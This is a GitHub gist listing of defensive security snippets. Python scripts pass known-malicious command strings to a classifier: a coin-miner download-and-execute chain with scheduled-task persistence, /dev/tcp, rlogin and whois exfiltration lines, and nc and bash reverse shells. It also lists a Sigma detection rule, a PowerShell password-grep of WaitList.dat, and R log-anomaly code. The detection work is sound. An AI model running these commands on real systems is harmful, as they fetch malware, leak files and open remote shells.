Skip to content

Instantly share code, notes, and snippets.

View holisticinfosec's full-sized avatar

Russ McRee holisticinfosec

25 followers · 3 following
View GitHub Profile
@holisticinfosec
holisticinfosec / LOLC_CoinMiners.py
Created December 28, 2021 05:15
LOLBINS coin miner commands from https://lolbas-project.github.io/
# LOLBINS coin miner commands from https://lolbas-project.github.io/
# LOLBINS rundll32 execution: https://lolbas-project.github.io/lolbas/Binaries/Rundll32/#execute
# LOLBINS regsvr32 execution: https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/#execute
# References:
# WannaMine: https://www.accenture.com/_acnmedia/pdf-46/accenture-threat-analysis-monero-wannamine.pdf
# https://logrhythm.com/blog/how-to-enable-process-creation-events-to-track-malware-and-threat-actor-activity/
from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.WINDOWS) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['cmd /c echo powershell -nop $a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(SCM Event Filter)))) {IEX(New-Object Net.WebClient).DownloadString(http://stafftest.spdns.eu:8000/mate6.ps1)} >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR %temp%\y1.bat &&SCHTASKS /run /TN yas
@holisticinfosec
holisticinfosec / LOLC_FileUploads.py
Created December 28, 2021 05:14
from GTFOBins: file uploads (exfil) examples via bash, rlogin, and whois
# from GTFOBins: file uploads (exfil) examples via bash, rlogin, and whois
# https://gtfobins.github.io/#+file%20upload
from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['bash -c echo -e POST / HTTP/0.9\n\n$(<$LFILE) > /dev/tcp/$RHOST/$RPORT',
'rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST',
'whois -h $RHOST -p $RPORT base64 $LFILE']
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):
@holisticinfosec
holisticinfosec / LOLC_ReverseShells.py
Created December 28, 2021 05:13
from GTFOBins: reverse shell examples via nc, gimp, and bash
# from GTFOBins: reverse shell examples via nc, gimp, and bash
# https://gtfobins.github.io/#+reverse%20shellc
from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['nc -e /bin/sh $RHOST $RPORT',
'gimp -idf --batch-interpreter=python-fu-eval -b import sys,socket,os,pty;s=socket.socket()',
'bash -c exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1']
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):
@holisticinfosec
holisticinfosec / rules_windows_nobellium_filedrop.json
Last active October 4, 2021 02:49
[
{
"title": "NOBELLIUM FoggyWeb File Drop Sysmon",
"description": "After compromising an AD FS server, NOBELIUM was observed dropping version.dll on the system.",
"author": "Russ McRee (holisticinfosec), Florian Roth, (@cyb3rops)",
"tags": [
"attack.persistence",
"attack.defense_evasion"
],
"level": "critical",
@holisticinfosec
holisticinfosec / sim_toolsmith_demo.xml
Created February 22, 2021 00:07
Sim toolsmith demo
<?xml version="1.0" encoding="utf-8"?>
<sim>
<delete>false</delete>
<errordirectory>C:\Users\Public\Documents\</errordirectory>
<task>
<config>
<name>PowerShell_test</name>
<loop>3</loop>
<pause>1000</pause>
</config>
@holisticinfosec
holisticinfosec / WaitList.dat.ps1
Created September 19, 2018 23:04
Barnaby Skeggs's WaitList.dat PowerShell enumerator
Stop-Process -name "SearchIndexer" -force;Start-Sleep -m 500;Select-String -Path $env:USERPROFILE\AppData\Local\Microsoft\InputPersonalization\TextHarvester\WaitList.dat -Encoding unicode -Pattern "password"
@holisticinfosec
holisticinfosec / SERVER-549521_Anomalies_Twitter+GESD.R
Last active June 16, 2018 18:25
SERVER-549521 Anomalies Twitter + GESD Methods
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
# Get only SERVER549521 access
SERVER549521 <- security_access_logs %>%
filter(server == "SERVER-549521") %>%
ungroup()
# Anomalize!!
SERVER549521 %>%
# Twitter + GESD
time_decompose(count, method = "twitter", trend = "4 months") %>%
@holisticinfosec
holisticinfosec / Decomposition_Anomalized_Downloads.R
Last active June 3, 2018 22:48
Decomposition of Anomalized SERVER-549521 Downloads
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
security_access_logs %>%
filter(server == "SERVER549521") %>%
ungroup() %>%
time_decompose(count) %>%
anomalize(remainder) %>%
plot_anomaly_decomposition() +
labs(title = "Decomposition of Anomalized SERVER-549521 Downloads")
@holisticinfosec
holisticinfosec / SERVER-549521_Anomalies_STL+IQR.R
Last active June 3, 2018 22:46
SERVER-549521 Anomalies STL + IQR Methods
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
SERVER549521 %>%
# STL + IQR Anomaly Detection
time_decompose(count, method = "stl", trend = "4 months") %>%
anomalize(remainder, method = "iqr") %>%
time_recompose() %>%
# Anomaly Visualization
plot_anomalies(time_recomposed = TRUE) +
labs(title = "SERVER-549521 Anomalies", subtitle = "STL + IQR Methods")
@holisticinfosec
holisticinfosec / Security_Access_Logs_Function.R
Last active June 3, 2018 21:57
Security Access Logs Function
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
library(dplyr)
library(tibbletime)
setwd("C:/coding/R/anomalize/")
logs <- read_csv("log.csv")
security_access_logs <- logs %>%
group_by(server) %>%
as_tbl_time(date)
security_access_logs